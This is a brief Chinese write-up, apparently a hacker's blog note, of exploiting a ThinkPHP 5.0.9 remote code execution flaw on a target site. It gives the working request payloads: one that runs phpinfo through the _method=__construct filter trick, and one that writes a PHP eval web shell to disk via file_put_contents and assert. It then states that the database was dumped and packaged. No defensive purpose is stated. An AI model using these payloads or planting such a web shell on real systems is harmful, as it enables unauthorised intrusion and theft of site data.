记一次tp5.0.9RCE
目标
常规报错
直接说版本tp5.0.9,然后尝试payload
_method=__construct&method=get&filter[]=call_user_func&get[]=phpinfo打出phpinfo
顺便看了哈disable_function
基本执行命令的payload都被禁了
还好payload多,直接拿下
s=file_put_contents(‘dd.php’,’<?php @eval($_POST[1]);’)&_method=__construct&method=POST&filter[]=assert
然后脱裤,打包,渗透结束